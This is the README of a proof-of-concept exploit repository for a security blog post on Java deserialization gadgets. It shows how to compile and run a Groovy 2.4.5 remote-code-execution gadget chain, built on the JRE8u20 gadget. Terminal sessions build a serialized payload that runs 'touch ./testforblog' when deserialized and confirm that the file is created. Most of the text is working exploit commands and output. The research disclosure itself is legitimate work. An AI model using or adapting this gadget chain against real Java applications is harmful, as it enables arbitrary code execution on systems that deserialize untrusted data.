groovy-2.4.5-exploit

This is the Java code related to our blog post https://codewhitesec.blogspot.com/2018/01/handcrafted-gadgets.html.

To compile the two Java files you first need to build JRE8Exploit-1.0-SNAPSHOT.jar (the project can be found here: https://github.com/pwntester/JRE8u20_RCE_Gadget), and you need the Groovy 2.4.5 library, of course.

kai@CodeVM:~/groovy-2.4.5-exploit$ java -version
openjdk version "1.8.0_151"
OpenJDK Runtime Environment (build 1.8.0_151-8u151-b12-0ubuntu0.17.04.2-b12)
OpenJDK 64-Bit Server VM (build 25.151-b12, mixed mode)

Compile code:

kai@CodeVM:~/groovy-2.4.5-exploit$ javac -cp /home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget.java BCSSerializationTest.java

Create BeanContextSupport example:

kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar BCSSerializationTest > bcstest.bin
Writing java.lang.Class at offset 1048
Done writing java.lang.Class at offset 1094
Writing java.util.HashMap at offset 1094
Done writing java.util.HashMap at offset 1172
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19

Deserialize example:

kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget deser bcstest.bin
{java.beans.beancontext.BeanContextSupport@27d6c5e0=whatever}

Groovy RCE gadget:

kai@CodeVM:~/groovy-2.4.5-exploit$ ls -al ./testforblog
ls: cannot access './testforblog': No such file or directory
kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget exploit "touch ./testforblog" > exploit.bin
Writing org.codehaus.groovy.runtime.MethodClosure at offset 973
Done writing org.codehaus.groovy.runtime.MethodClosure at offset 1490
Adjusting reference from: 6 to: 8
Adjusting reference from: 6 to: 8
Adjusting reference from: 8 to: 10
Adjusting reference from: 9 to: 11
Adjusting reference from: 6 to: 8
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 14 to: 16
Adjusting reference from: 17 to: 19
Adjusting reference from: 17 to: 19
Adjusting reference from: 4 to: 27
Adjusting reference from: 4 to: 27
Adjusting reference from: 7 to: 30
Adjusting reference from: 1 to: 24
kai@CodeVM:~/groovy-2.4.5-exploit$ java -cp .:/home/kai/JRE8u20_RCE_Gadget/target/JRE8Exploit-1.0-SNAPSHOT.jar:/home/kai/eworkspace/lib/groovy-all-2.4.5.jar Groovy245Gadget deser exploit.bin
Exception in thread "main" java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.util.Set
	at com.sun.proxy.$Proxy2.entrySet(Unknown Source)
	at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2173)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2064)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
	at java.util.HashMap.readObject(HashMap.java:1409)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2173)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2064)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1568)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
	at Groovy245Gadget.main(Groovy245Gadget.java:43)
kai@CodeVM:~/groovy-2.4.5-exploit$ ls -al ./testforblog
-rw-r--r-- 1 kai kai 0 Jan 18 15:29 ./testforblog
kai@CodeVM:~/groovy-2.4.5-exploit$